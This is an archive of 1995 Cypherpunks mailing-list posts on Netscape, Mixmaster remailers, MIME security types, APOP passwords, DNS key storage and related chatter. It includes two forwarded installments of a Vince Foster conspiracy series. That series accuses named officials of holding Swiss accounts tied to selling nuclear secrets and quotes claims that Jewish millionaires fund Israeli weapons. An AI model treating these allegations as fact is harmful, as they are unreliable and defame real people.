success of the >Web speaks for itself... This is not a view I have just come to, as my >recent message shows. Agreed. My posting seemed to get stuck in the response queue to the original post, and came out a little "dated", I guess... > >And I'm not wedded to "Netscape" per se, though that particular environment >has the current momentum. I've also used Mosaic and MacWeb to do much the >same things, but find Netscape smoother. I agree. By far the best web-browser out there is Netscape. They don't call it Mozilla for nothing. > >Out of curiosity, the phrase "grown out of Netscape," aside from the >implied barb, means what? Just what am I missing and what do I need to >"grow out of"? No. That seems to be my unintentional verbal style on the net, a little prickly around the edges. My actual barbs are so over the top that you'll never misunderstand them for their subtlety. What I mean is, that after you've used Netscape, a web client, to read news for a while, you'll start to think about more specialized applications like Newswatcher, for instance. The reason that Netscape has either built-in news reading or mail reading functions is feature creep. My hypothesis is that feature creep is brought about by some combination of venture capitalists, securities analysts, and "real marketing people", all of which Andreasson at Netscape has in spades, now, all with their chins on his shoulder saying, "That's nice, what else will it do?". In-line gifs or jpegs (or mpegs or whatever) are integral to the function of seeing what's on the web. So are in-line FTC, Gopher, etc. I think. My opinion about e-mail and news are that they're pretty orthogonal to the functionality of a web-browser. Kind of like building wheels on a boat. >If, perchance, this is just what of those throwaway barbs, implying I move >from fad to fad (as Fraering's post implied), you should know that I stuck >with tin/elm/emacs/Eudora for more than 3 years, as nothing obviously >better--and worth the learning curve to switch to--had come along. (In the >Mac domain I used other programs, none of them "-works" packages.) No, Tim, your mother does *not* wear army boots. ;-). I just have several friends who recently moved to a TCP net feed and thought they only needed Netscape. That is, until they used Eudora, and/or Newswatcher (preferably in it's "value added" editions), and switched to them instead for their respective purposes. >But, I'll tell you what, I *will* tell you about it in 6 months, whether or >not I've grown out of Netscape! Of that we can rest assured. :-). Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBLOsPgyLN8bw6ZVAQEzbAP/eosm6SNC1TdvduCWlPVO9WDbqlAcQtvj jL+jsy0QjEgMNwsGQGCQBAHMXxtOJC2GPC+lGVfGZcTDFljvgzhBJc2/QWI0mQcK Jz/vdYGfxhkBSlW0Xm+zcilmyYgvMr/KeIeJUcExYyVSSWpof7fuSG6jkfVmTWZ5 JDSHHd922U4= =ipGf -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From lmccarth at thor.cs.umass.edu Sun Jul 23 15:39:50 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Sun, 23 Jul 95 15:39:50 PDT Subject: An idea about Java and remailer clients and servers... In-Reply-To: <199507221301.AA27475@tyrell.net> Message-ID: <199507232239.SAA32575@thor.cs.umass.edu> Phil Fraering writes: > I was under the impression that there was a lot of common code > between the Mixmaster client and server versions, at least in > the current version. > > Does it have to be the case, then, that we even have separate client > and server versions? If a new program is going to be written in Java, > can't it have the functionality of both client and server? Indeed, that's the way the C version works now: [from README.client in the Mixmaster distribution]: # Mixmaster uses the same source & binary for the remailer program and the # client program. Setting up a client, however, is significantly easier. > Why not "charge" for the ability to send an anonymous message with > the duty to have for a short time (maybe an hour or two) running on > your machine a node in a remailer network? It would be interesting to see how the market would react to this. There might be quite a bit of reluctance to take on the liability of a remailer operator just to send an anonymous message (maybe that's a good thing ;) Some mechanism would need to be worked out to tie delivery of each message to satisfactory performance of its true originating address, without making it much easier for an opponent to tie a message to its point of origin. -Futplex From rah at shipwright.com Sun Jul 23 15:58:43 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 23 Jul 95 15:58:43 PDT Subject: Netscape the Big Win(dows) Message-ID: >the function of seeing what's on the web. So are in-line FTC, Gopher, etc. ^^^ Onk? Revenge of the spellchecker (Spellswell in this case). Of course, I mean FTP. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From QLDM75A at prodigy.com Sun Jul 23 16:06:12 1995 From: QLDM75A at prodigy.com (MR ELDON B JENKINS) Date: Sun, 23 Jul 95 16:06:12 PDT Subject: Anyone going to DEFCON Message-ID: <013.08997009.QLDM75A@prodigy.com> > As chance has it, I will be vacationing in Las Vegas July 29 - August 6. > Is anyone else planning on going to DEFCON? I won't be attending the > whole thing, just selected exerpts, but if there is a get together let me > know!As chance has it, I will be vacationing in Las Vegas July 29 - August 6. > Is anyone else planning on going to DEFCON? I won't be attending the > whole thing, just selected exerpts, but if there is a get together let me > know! I don't know if anyone else from this list is going but I will be there for the whole conference and wouldn't mind meeting up with some of the people from this list. You might want to join the "defcon stuff" list. It is just for people going to DefCon to talk about meetings and stuff. It is dc-stuff at fc.net (I think) if that doesn't work mail me and I'll get it from one of my message. Eldon Jenkins From bdolan at use.usit.net Sun Jul 23 17:09:15 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Sun, 23 Jul 95 17:09:15 PDT Subject: Kalliste re. Foster / NSA, VII Message-ID: >From KALLISTE at delphi.comFri Jul 21 10:59:41 1995 Date: Fri, 21 Jul 1995 04:04:35 -0400 (EDT) From: KALLISTE at delphi.com Subject: Part VII -----BEGIN PGP SIGNED MESSAGE----- Allegations Regarding Vince Foster, the NSA, and Banking Transactions Spying, Part VII by J. Orlin Grabbe It has come time to talk of Vince Foster and virtual realities. 1. One type of virtual reality immersion takes place every evening with respect to network news. One sits in a familiar chair, and watches familiar faces on familiar channels telling soothing or alarming things about other parts of the world--other realities--of which the viewer has no experience, all of it demonstrated by reality-simulating sound bites and video clips. The virtual reality construction is good if the story sounds plausible. That is, after all, the job of a TV reporter: to tell a plausible story and to entertain our eyes by looking good while telling it. The pulp magazine reporter, on the other hand, must tell a plausible story and keep it lurid enough to grab our imagination. Take the allegedly important question of "child porn on the Internet," recently paraded forth by *Time* magazine. To the computer-impaired, pedophilia might serve as a plausible explanation why anyone would sit for hours in front of a computer screen. Never mind that the neighborhood Internet-user says differently: you can't take the word of a pedophile can you? The Internet-user, on the other hand, may believe that rock videos are a more reliable guide to reality than *Time* magazine. And even if he were actually interested in porn, he might find life easier by going to the local video store where a single video tape could store as much graphical infor- mation as could be stored on 2000 digital compact disks. 2. Another type of virtual reality is found in the banking world. Money is data stored in a computer. This money is "transferred" place to place by changing the ownership labels associated with the data. Once the computer receives the proper transfer authorization codes, the money can be "launched" from one bank to another, from one account to another. All that is necessary is that one properly emulate the reality that is important to the bank computer. If you include all the right digital indicators that make it plausible to the computer that you are the authorized transfer person for, say, the account owned by C. Jefferson, the computer will believe you. It won't care about non-virtual reality--what C. Jefferson looks like, or what her tastes in clothes are-- nor will the computer have metaphysical doubts to cause it to hesitate in its actions before sending the money on its way. "You" are nothing more than a preselected set of codes. In the version of Jim Norman's article *Fostergate* published in *Media Bypass* (August 1995), it is stated: "For months, a small cadre of CIA computer hackers known as the Fifth Column, armed with a Cray supercomputer, had been monitoring Foster's Swiss account. . . . Foster was just one of the first of scores of high level U.S. political figures to thus have their secret Swiss accounts looted of illicit funds . . . . Over the past two years . . . more than $2 billion has been swept out of offshore bank accounts belonging to figures connected to the U.S. government with nary a peep from the victims or their banks." Where did the money in the accounts come from? Jim Norman doesn't say. I assert that some of this loot is defense and arms dealing payola; some of it is drug dealing profits or payola; and some of it is payola from the floating fortune left by a forgotten oil man-- whose money moves from bank to bank in a merry-go-round to keep its location hidden from the potential heirs. And some of the loot was paid in an attempt to allow one nation to become a VIRTUAL NUCLEAR POWER. 3. Missile launches take place in a virtual reality. Given the proper launch code, the missile will attempt to go to its programmed destination without further theological debate. A country possessing the launch codes and also targeting infor- mation for *another* country's nuclear missiles could become a virtual nuclear power. (The targeting information would be as important as the launch codes. For before you launched a missile, you would first want to know where it is going. After all, it could be aimed at you.) Getting your nuclear arms this ways would have obvious economic advantages: someone else would foot the military bill. Jim Norman states in *Fostergate*: "According to a heavily-redacted New Mexico FBI counter- intelligence report, Maxwell was apparently allowed to sell two copies of PROMIS back to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims was a hugely inflated price of $87 million. That would have allowed Pollard, if he was using the rigged program, to obtain U.S. missile targeting data long before Israel had its own satellite capability, thus making it a real nuclear threat to the Soviet Union." Well, yes, it could make Israel a real threat to the Soviet Union. But not from Israel's own puny missile program. Rather, Israel could be a threat to the Soviet Union because it would be able to launch our (U.S.) missiles at the Soviet Union. Being a virtual nuclear power would mean not having to say you are sorry. If a U.S. missile were launched at Russia, the defense system of Russia would, in its virtual view of the world, see the missile as coming from the U.S. It would launch a retaliatory strike against the U.S., because in its reality only the U.S. could be responsible. It wouldn't be programmed to recognize "Missile from U.S. not U.S.-intended action." Being a virtual nuclear power means you could *blackmail people in both directions*: you could blackmail the targeted city or area. More importantly, you could blackmail the U.S. If the U.S. doesn't go along with your demands, why, you could involve it in a nuclear war in which you would be a spectator, not a participant. The U.S. would know it has more to lose than you do, so it would give in to your demands. Vince Foster's NSA connections wouldn't give him access to such launch codes and targeting data. Not even with the help of Jonathan Pollard. It would take the cooperation of a small circle of friends--friends with Defense and Intelligence connections. People with access. People with authority. Would any of the U.S.'s own Defense Department or Intelligence personnel in the 1980s or the 1990s, people other than Jonathan Pollard, have been involved in such a transfer of information to a foreign power--whether to Israel or to anyone else? Surely not anyone connected to the account numbers KPFBMMBODB or KPFBMMBODE held at the Union Bank of Switzerland? Please, say it ain't so. For if they were, the U.S. may now be facing its greatest National Security threat since the Cuban Missile Crisis. And that's why everyone has an interest in covering up the various threads connected to the death of Vince Foster. Some are scurrying around, hoping no one will realize how bad things are before the mess can be cleaned up. Others are scurrying around, just covering their asses. It's showdown time, with no space for killing all the remaining witnesses or burying all the remaining evidence. It's showdown time, and the money people thought they had for ammo is missing from their Swiss accounts. The levels of disinformation have already been prepared. The first level says Vince Foster was just a political flack who committed suicide. The next one says, yeah, he was into some nasty stuff like money laundering, but had no intelligence connections. The next one beyond that allows him to work for the NSA, but not for long or in a very important position. The next one allows Foster to sell some nuclear secrets to Israel, but that was just to accelerate their own nuclear program, as a bulwark against the Soviet Union. And anyway, Foster acted alone. And so on, spin control all the way. Foster, being dead, will have nothing to say about his many potential roles. But underneath all this the Powers That Be have begun to comprehend that some of their own have threatened their very survival. And the Powers That Be are going to clean house with a vengeance. [To be continued] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMA95UGX1Kn9BepeVAQEhHgP/bfzNzLA7vM/g51Tz6OK7OVf6C+oMhFsF G4/RM4qBUQUxB51YAcQu7RLSxhpolml/kDu2eeEk/AAu5JWG2dLDyOWdnW5ODOJ3 yaY6F4t5CQh2eccAYQegbjsL+2FQ5yO3Lp+pi9jkvAGKLQEUD65QlTOeLfP2xlBV 9j8iz/gFYpg= =gv8z -----END PGP SIGNATURE----- From bdolan at use.usit.net Sun Jul 23 17:14:19 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Sun, 23 Jul 95 17:14:19 PDT Subject: Part VIII: Vince Foster (fwd) Message-ID: ---------- Forwarded message ---------- Date: Sun, 23 Jul 1995 20:08:57 -0400 (EDT) From: KALLISTE at delphi.com To: bdolan at use.usit.net Subject: Part VIII: Vince Foster -----BEGIN PGP SIGNED MESSAGE----- Allegations Regarding Vince Foster, the NSA, and Banking Transactions Spying, Part VIII by J. Orlin Grabbe Did our former Secretary of Defense Caspar Weinberger, like Vince Foster, have a Swiss Bank account? Does he still? Is his name on account number KPFBMMBODE at the Union Bank of Switzerland? Was that why Caspar Weinberger, Publisher Emeritus at *Forbes*, became so gung-ho to get Jim Norman's article *Fostergate* killed? What is the relationship between Caspar Weinberger and Vince Foster? What does Ron Perelman, an equity owner of *Forbes* and Revlon, have to say about all this? (Is there lipstick all over the Pentagon?) Don't get me wrong. I think the Swiss banking system is the finest in the world, and we should ALL have Swiss banking accounts. We should ALL have the right to hide our assets from prying eyes. Just as long, of course, as those assets were fairly earned--and they don't represent payola from public defense projects. Or proceeds from the sale of *bona fide* national security secrets. Or payola to keep the knowledge of such sales secret. Were Caspar Weinberger's Swiss assets simply savings from his paycheck and profits from his investments? Are U.S. nuclear secrets for open sale on the world market from one of our alleged "allies"? Bobby Ray Inman graduated from the Naval War College in 1972, became Assistant Chief of Staff for Intelligence of the Pacific Fleet in 1973, Director of Naval Intelligence in 1974, Vice Director of the Defense Intelligence Agency in 1976, Director of the National Security Agency in 1977, and Deputy Director of Central Intelligence under Ronald Reagan in 1981. He left that post in March 1982. In December 1993 he was nominated by Bill Clinton to be Secretary of Defense. ("Bibliography of Bobby Ray Inman," Office of the Press Secretary, The White House, December 16, 1993.) "After Admiral Inman's announcement that he would not serve as Clinton's Defense Secretary, the Hebrew press devoted a fair amount of space to the implications of that affair for Israel. . . . Most important among these writings were the articles by Amir Oren (*Davar*, January 28) and Yoav Karni, published the same day in the newly founded weekly *Shishi*. . . . Oren's article in particular stressed the incompatibility between Inman's past policy recommendations and Israeli political aims, especially in regard to nuclear developments. Both authors, who usually are mildly critical of Israel's policies but never of its nuclear build-up, were emphatic in their hostility toward Inman. Furthermore, Oren discussed in depth Pollard and Israeli espionage in the U.S. as having something to do with Israeli objections to Inman as a person and to his policy recommendations." (Israel Shahak, "Involvement of the pro-Israel lobby in the Inman affair," Report No. 133, February 11, 1994.) Shahak goes on to note that: "When Yoel Markus (*Haartez*, December 31, 1993) spoke of the recent 'courtship' of Israel by various states, he concluded that 'this courtship has nothing to do with the peace process . . . When the U.S. is being ruled by an administration as favorably disposed to Israel as the present one, conviction spreads in every state that the only way to America's purse leads via Israel.' " A chief objection to Inman was he might implement U.S. inspections of the Israeli nuclear production process at Dimona: "Oren mentions a number of reasons why Israel loathed and feared Inman. But as the main of those reasons Oren projects the Israeli expectation that, if appointed the U.S. Defense Secretary, Inman would be able to put into effect independent American inspections of Israeli nuclear armaments and their production process in Dimona. It needs to be recalled that by virtue of a secret agreement with the U.S. reached during the first year of John F. Kennedy's term of office as president, the U.S. to this day receives only such information about Israeli nuclear power as Israel is pleased to convey. After the Bay of Pigs fiasco Kennedy needed the support of the 'Jewish lobby'. In order to get it, he okayed this curious agreement." (Israel Shahak) Shahak cites evidence that much of Israel nuclear capability had been acquired through espionage directed against the U.S. (The following reference to "Critical Mass" is to a book called *Critical Mass* by William E. Burrows and Robert Windrem.) "*Yediot Ahronot*'s correspondents Tzadok Yehezkeli and Danny Sadeh (January 30), write in their review of the book "Critical Mass" . . . that 'Israel solicits money from wealthy Jews from all over the world for financing its nuclear weaponry programs. This fundraising drive is directed by a committee comprised of 30 Jewish millionaires'. . . . . "[Tzadok Yehezkeli and Danny Sadeh] write that 'Israel is ever ready to launch its nuclear missiles on some 60 to 80 targets. Those targets include the sites in the Gulf, the capitals of all Arab states, some nuclear bases on the territory of the former USSR and some sites in Pakistan'. (I am convinced this is accurate.) It means that Israel must very much want to obtain the U.S. satellite information about the entire targeted area, a not so negligible part of the earth's surface. The existence of a so formidable nuclear power in Israel's hands can not be convincingly attributed to its own Research and Development efforts nor even to its role as a tool of American policies. On the contrary, a nuclear power of that magnitude must be presumed to run counter to U.S. imperial interests. The only plausible explanation is that Israel has acquired its nuclear power with at least some help of its 'Jewish friends' in the U.S. Yehezkeli's and Sadeh's information about 'the nuclear bases on the territory of the former USSR' fits well with what Geoffrey Aronson, relying on State Department sources, reveals about the Pollard affair ("The Christian Science Monitor", January 27). He writes that according to 'unanimous response' from these sources, what Pollard has been always said to have betrayed, were 'this country's most important secrets', namely the 'information relating to U.S. targeting of Soviet nuclear and military installations and the capabilities and defenses of these sites'. This seems to accord with Israel's global aspirations based on its nuclear power. Aronson also quotes his sources to the effect that much of intelligence passed on by Pollard 'was unusable to the Israelis except as bargaining chips and leverage against the United States and other countries' interests'. In view of this fact Aronson conjectures that Pollard's intelligence was used by Israel for deals with Moscow consisting of 'trading nuclear secrets for Soviet Jews'." (Israel Shahak) Shahak goes on to quote Oren with respect to Jonathan Pollard: ". . . 'a Navy Intelligence employee, Jonathan Pollard, was caught red-handed while passing on to Israel precisely this kind of information which Inman had decided to withhold from Israel. . . . And interpreted likewise as coincidental were the links connecting Rafi Eitan, then the chief of the 'Office for Scientific Contacts' (LEKEM), who employed Pollard, with the [Israeli] Defense minister, Ariel Sharon, who had appointed Eitan and who rushed to Washington in order to complain against Inman and his orders.'.... Eitan ran Pollard with the explicit approval of four Defense ministers and Prime Ministers, concretely Arens, Rabin, Shamir and Peres.'" Rafi Eitan's reward for the Pollard affair? "After helping sell Iraqi oil all over the world, he now oversees the Israeli trade with Cuba" (Shahak). Let me ask again: Are U.S. nuclear secrets for open sale on the world market from one of our alleged "allies"? Are U.S. nuclear secrets for open sale by the Defense Department personnel who allegedly guard them? Why did Mike McCurry, Press Secretary on the White House, spent time trying to convince Sarah McClendon, veteran White House journalist, that Jim Norman is a fruitcake? If Jim Norman is a liar or a fruit cake, why did an editor at *Insight* magazine receive a visit from the Pentagon? Why was Jim Norman's in-progress interview with Jack Christie on the USA Radio Network today (July 23, 1995) interrupted for reasons of "national security"? If lying is a national security problem, what is Bill Clinton doing in the White House? Why is it that the sale of *bona fide* national security secrets is tolerated, even rewarded with lucrative payments to Swiss accounts, while journalistic reports about THE LOOTING AND SALE OF U.S. NUCLEAR SECRETS are quashed as "national security"? Is the Pentagon run by lunatics and thieves? "We have put our faith in the bomb, and it is the bomb which will answer our prayers."--Henry Miller, *The Time of the Assassins* [To be continued] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBMJTWX1Kn9BepeVAQG+IgP/TUu5xuMFrovIWwI7obwjIqkXCfY+aDWd QyBlv3XeLly8QY1Kxc51yYlylrnWgIqlUJwphpBxy5T7YchJvHGxT3uyevVs4mME sZ7Czh4ulVqX2swAZ8cHs5COjbeu1jtfFEqvKhIaapoHAQ84/AO+4OdXgbiwF/6g N6mSJ2BQfPE= =BEom -----END PGP SIGNATURE----- From tcmay at sensemedia.net Sun Jul 23 20:33:54 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sun, 23 Jul 95 20:33:54 PDT Subject: Netscape the Big Win(dows) Message-ID: At 10:36 PM 7/23/95, Robert Hettinga wrote: >What I mean is, that after you've used Netscape, a web client, to read news >for a while, you'll start to think about more specialized applications like >Newswatcher, for instance. Speaking for myself, of course, I used Newswatcher _before_ using Netscape's newsreader. >No, Tim, your mother does *not* wear army boots. ;-). I just have several >friends who recently moved to a TCP net feed and thought they only needed >Netscape. That is, until they used Eudora, and/or Newswatcher (preferably >in it's "value added" editions), and switched to them instead for their >respective purposes. I've been using Eudora since early on, in 1992, via my Netcom shell account. And Eudora Pro since it came out. Now I use it on my PPP account, but the functionality is essentially the same as when I was using a shell account. As for Newswatcher, see above. As for other non-Netscape tools, I also have MacWAIS, Anarchie, TurboGopher, Finger, NCSA Telnet, Talk, etc. I use specialized tools when the need arises. But Eudora + Netscape meet most of my Net needs, which are for doing mail, reading and posting to News, fetching files, checking out Web sites, etc. I'm not saying this combination meets the needs of everyone, and their mileage will likely vary, but I do dislike arguments of the flavor: "Ah, Tim, wait until you learn what a real computer is, wait until you see what's out there besides Netscape." --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From lmccarth at thor.cs.umass.edu Sun Jul 23 21:05:09 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Sun, 23 Jul 95 21:05:09 PDT Subject: MOSS and Mixmaster: A Media Type Proposal In-Reply-To: <9507090007.AA06052@snark.imsi.com> Message-ID: <199507240403.AAA00248@thor.cs.umass.edu> Perry Metzger writes: >>> It would be very, very good if everyone doing secure mail systems of >>> one sort or another (including PGP integrated mail packages and >>> remailers) slowly moved forward to the formats described in this >>> document, which is now a proposed internet standard... The IESG writes: > The IESG has approved the following two Internet-Drafts as Proposed > Standards: > > 1. MIME Object Security Services > 2. Security Multiparts for MIME: Multipart/Signed and > Multipart/Encrypted > > > These documents are the product of the Privacy-Enhanced Electronic Mail > Working Group. The IESG contact person is Jeffrey Schiller. > > > Technical Summary > > These documents describe a general framework for security within MIME > (draft-ietf-pem-sigenc-03.txt) and a specific proposal for offering > Privacy Enhanced Mail services within MIME(draft-ietf-pem-mime-08.txt). > Support is provided for digital signatures on MIME objects (both simple > and compound) as well as for confidentiality provided through data > encryption. I've spent some time reading these proposed standards, along with parts of RFCs 1423 and 1590, with an eye to applying them to remailers. I'd like to get a sanity check and comments before I consider proceeding with submission to the IETF Media Types review list, etc. I propose a new Media Type subtype for Mixmaster remailer packets, "application/mixmaster". (For the purposes of this message, "Mixmaster remailer packet" refers to a packet generated by a Mixmaster server or client, and intended for transmission to a Mixmaster server. It does *not* cover messages generated by a Mixmaster server that are intended for an ultimate message recipient.) This is intended to be an experimental protocol for use in the control part of a multipart/encrypted message. There is one required parameter, "version", meant to indicate the version number of the originating Mixmaster software. In addition, one optional parameter, "key-id", may be included. If present, this parameter would indicate the single line key prefix/ID of the public Mix key used to encrypt (at the outermost layer) the contents of the application/mixmaster part. This might be used to thoroughly disambiguate decryption options in the event that the recipient server has more than one currently active public Mix keys. The application/mixmaster (control) part of the multipart/encrypted message would contain the padded list of Mixmaster server hop headers, superencrypted at the outermost layer with a public Mix key (presumably, one belonging to the recipient server). A single decryption of these headers should reveal the IDEA key used to superencrypt, at the outermost layer, the body part of the multipart/encrypted message. The application/octet-stream (body) part of the multipart/encrypted message would contain the list of ultimate recipients of the remailed message, the text of the message itself, and any additional processing instructions to the final Mix server. The latter, body part of the multipart/encrypted message shall have been encrypted by the originator using the IDEA key specified in the former, control part. The contents of the application/mixmaster part should be encoded in accordance with the standards for application/octet-stream. (NB: this amounts to a division of the extant Mixmaster packet format roughly into a control section and a body ("payload") section.) Comments ? -Futplex From stewarts at ix.netcom.com Sun Jul 23 21:37:28 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 23 Jul 95 21:37:28 PDT Subject: OVR_byt Message-ID: <199507240435.VAA11139@ix7.ix.netcom.com> #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A At 06:36 PM 7/23/95 -0400, Robert Hettinga wrote: >The reason that Netscape has either built-in news reading or mail reading >functions is feature creep. [....] > In-line gifs or jpegs (or mpegs or whatever) are integral to >the function of seeing what's on the web. So are in-line FTC, Gopher, etc. >I think. My opinion about e-mail and news are that they're pretty >orthogonal to the functionality of a web-browser. When you're building software to run portably across a variety of operating systems with varying levels of multitaskability or brain-damage, building a big monolith with good modularity inside seems a reasonable compromise, and it means you don't have to do as much work to define interfaces that talk to everybody else's cool application program. Since URLs are designed to let you point to just about anything, it's real nice if your browser client can actually do something useful with any URL it finds. I think that includes sending mail in response to mailto:s (though not receiving it; that's really Somebody Else's Problem), and at least popping up a crude newsreader to read news: URLs. It would certainly be nicer to have a system that's aggressively tool-based with obvious interfaces chosen to call other applications if the user configures them instead of the default app. On Unix that's usually easy (fork/exec with some appropriate command-line args and popular data formats); on Macs it's not too bad; on DOS, well, anyway. Winsock at least means that Windows applications have some chance of using the network compatibly at the same time, which was previously a major annoyance; now it just makes it harder to use the _Microsoft_ clients along with Netscape and your other cool apps, but hey. #--- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- # Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/ M0V]N9W)E2!T;R!A At 2:42 PM 7/22/95, Dan Bailey wrote: >On Wed, 19 Jul 1995 11:39:07 -0700 you wrote: > >>At 11:02 AM 7/19/95 PDT, rick hoselton wrote: >>>I want to register the 1-bit key of "1". I expect to >>>send about half my message bits encrypted, the rest will be clear-text. >> >>Oh, go ahead, register 0 also. You'll probably want to switch keys >>occasionally during sessions. > >Actually, why don't we just register our favorite geometric constant, >pi? Assuming it's non-repeating, and non-terminating, you're >guaranteed that whatever key you end up using will be somewhere in pi. Reasons this won't work: 1. The Real Reason: It's terminally cute, and terminally cute arguments rarely stand up in court. 2. The Technical Reason: As I recollect, it is unproven that "any sequence of digits will appear in pi someplace." (It may be expected that any finite sequence will eventually appear, but I'm unaware of any proof, and I have reason to suspect such a proof might be impossible.). A wise-ass judge--not that any court in the rational (or irrational) world would ever deal with this--could demand proof. 3. The Legalistic Reason: The "key registration" law would likely be phrased in terms of direct opening of messages, not existential trickery about "the set of all keys." I urge that we deal with key registration on more plausible bases than trickery and sophistry. (How may keys can dance on the head of a PIN, and all.) --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From btmoore at iquest.net Sun Jul 23 22:09:55 1995 From: btmoore at iquest.net (Benjamin T. Moore) Date: Sun, 23 Jul 95 22:09:55 PDT Subject: speeding detected by civilians Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 02:01 PM 7/13/95 -0700, Vladimir Z. Nuri wrote: >hate to start another endless thread on speeding limits, but >this is an interesting privacy anecdote... hope this hasn't >been posted here. > > >=== > >From: "Steven M. Horvath" >Subject: Speeder's Beware of Vernon Hills, IL. >To: snet-l > >- - -------- FYI------------------FYI--------------------FYI----------------- > >Vernon Hills, IL. > >Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing >citizens to check out radar guns from the local police department to >catch speeders in their community. The radar guns are combined with >cameras in order to instantaneously capture the car, license number, and the >rate of speed. The citizens can check out the units for a week at a time. The >police have stated that they, at this time, will use the data to issue >warning letters to the violaters. > > > > > > >- ------- End of Forwarded Message Actually... this sounds like a GREAT IDEA!!! Do you know how many cops you could catch with one of those??? I cannot count the times I've had cops go by me at speeds in excess of 80 mph without lights or sirens! Everyone ought to check one of those things out, catch the cops and turn it in to your local media establisment! Benjamin T. Moore, Jr. btmoore at iquest.net (Jian #AJF - IRChat) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMBMV/4SAJOVFNaChAQEO0wf/W8Nudez5Xu6+VqomN6jlE5aKixkNz59M UTh9y57zRMuYr1sE1abqr90kmANwo6bG8CmOmn1CS9vnGjvhzO4MeJJGfsc3elwT EMXTJy4Er5DPoswqUehNKghKvoNEvxL0+CUcTVjkMNCrOt6O5oetUq4hzPBKwC8a G98Mk8uTZ64YpU1IIZQmHaZrUgA0DpV2tDFA3vX4dSxpeKYP0EHmEIeV1jL8kax+ /DQqYYzYaQYGjfA7bAo6d9jBJkjlPqSYiJVnjTKSScqF7ke31nPfNMCC1B+XdhpQ G7+rDEcyFubj0awwV8liYE7dnM3j0wxAy9hb0fzNINUv5xNjbj3KTA== =sx7M -----END PGP SIGNATURE----- From monty.harder at famend.com Mon Jul 24 01:36:40 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Mon, 24 Jul 95 01:36:40 PDT Subject: big word listing Message-ID: <8ADC4F8.000300024C.uuout@famend.com> AS> > password AS> > AS> >and sends it to the server as "APOP username 58349485whatever89583449". AS> Of course, this requires the user password to be stored unencrypted on the AS> server; which you may not want to do. Here's a variation, then: Instead of using process-id.clock to generate the random stuff for the challenge, have your own (P)RNG make up a bunch of them ahead of time, calculate the hashes, and store the challenges and hashes on the server. The password file is kept encrypted, and only decrypted to run the above. You could even do the whole thing by remote access, making up a batch of id: pairs of challenge/repsonse on one machine, encrypt the thing and send it to the server via remailer chain. The reason for the "stealth" bit is because the locus of control is moved to the remote machine, which may itself fall prey to attack. So, the supervisor needs to login as a Mere User (could have several accounts like this, and/or change them frequently) so as to not leave a trail of bread crumbs back to the cottage. * Long, long ago, in a tagline far far away... --- * Monster at FAmend.Com * From sommerfeld at orchard.medford.ma.us Mon Jul 24 05:27:19 1995 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Mon, 24 Jul 95 05:27:19 PDT Subject: Netscape the Big Win In-Reply-To: <9507231958.AA00910@snark.imsi.com> Message-ID: <199507241221.MAA00651@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- R$ wrote: > > I have serious concerns about whether the DNS stuff will really scale. > > It's gonna blow out DNS server memory use, and the bigger packets means > > a *lot* more TCP (vs UDP) activity. Perry wrote: > I'm not that worried. HESIOD has already shown that you can afford to > store really mongo databases in the DNS, and with caching I suspect > the TCP activity isn't going to be over very wide distances for the > most part. Perry's right. With a fairly current BIND (named), MIT stores on the order of 100-200 bytes of data per Athena user for ~25000 users. MIT's been doing this for years; for the longest time, they were using ~1 MIPS Vaxstation II's with ~9MB of memory as DNS servers. 1024 bit RSA public keys are ~128 bytes, as are digital signatures. If we allow framing and similar stuff to expand the size of the data to 150 bytes per key/signature, and if each user had a signed key in the DNS, this would roughly triple the amount of data in the DNS. This Is Not A Problem. I haven't looked at the CPU load needed to compute the signatures, but that takes place off-line, not on-line. - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBMBOQTbT+rHlVUGpxAQEwrgP9HRftK+uw1zDQuLEy8uCe58QHwVXNXJTy 8fxoK5+k7d56/k55l6yVjTrBUnSCRZibukQLididjnkDr3P7Qv3cdafkkSxxTY/5 